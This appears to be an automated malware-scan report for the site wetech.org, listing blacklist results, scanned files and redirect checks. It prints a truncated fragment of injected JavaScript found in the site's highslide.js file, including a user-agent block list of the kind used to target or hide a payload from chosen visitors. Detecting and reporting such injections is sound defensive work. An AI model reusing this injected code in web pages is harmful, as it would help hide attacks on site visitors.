Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wetech.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wetech.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wetech.org/ | 200 OK Content-Length: 5455 Content-Type: text/html | clean |
http://wetech.org/mod/jquery/jquery.js | 200 OK Content-Length: 29611 Content-Type: application/javascript | clean |
http://wetech.org/mod/highslide/highslide.js | 200 OK Content-Length: 50145 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){ function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I if (hs.hideIframes) this.showHideElements('IFRAME', 'hidden', imgPos); }; hs.addEventListener(document, 'mousedown', hs.mouseClickHandler); hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(window, 'load', hs.preloadImages); hs.graphicsDir = './mod/highslide/graphics/'; hs.outlineType = null; window.onload = function() { hs.preloadImages(); }
Antivirus reports:
http://wetech.org/mod/rt_popup/lib.js | 200 OK Content-Length: 3171 Content-Type: application/javascript | clean |
http://wetech.org/js/swfobject.js | 200 OK Content-Length: 9344 Content-Type: application/javascript | clean |
http://wetech.org/js/rollover.js | 200 OK Content-Length: 3407 Content-Type: application/javascript | clean |
http://wetech.org/index.php | 200 OK Content-Length: 5455 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=4 | 200 OK Content-Length: 5879 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=214 | 200 OK Content-Length: 4115 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=215 | 200 OK Content-Length: 4153 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=216 | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=217 | 200 OK Content-Length: 4153 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=218 | 200 OK Content-Length: 4165 Content-Type: text/html | clean |
http://wetech.org/?page=home | 200 OK Content-Length: 5455 Content-Type: text/html | clean |
http://wetech.org/test404page.js | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wetech.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:48:25 GMT
Server: nginx
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: wetech.org
Referer: http://www.google.com/search?q=wetech.org
Result:
The result is similar to the first query. There are no suspicious redirects found.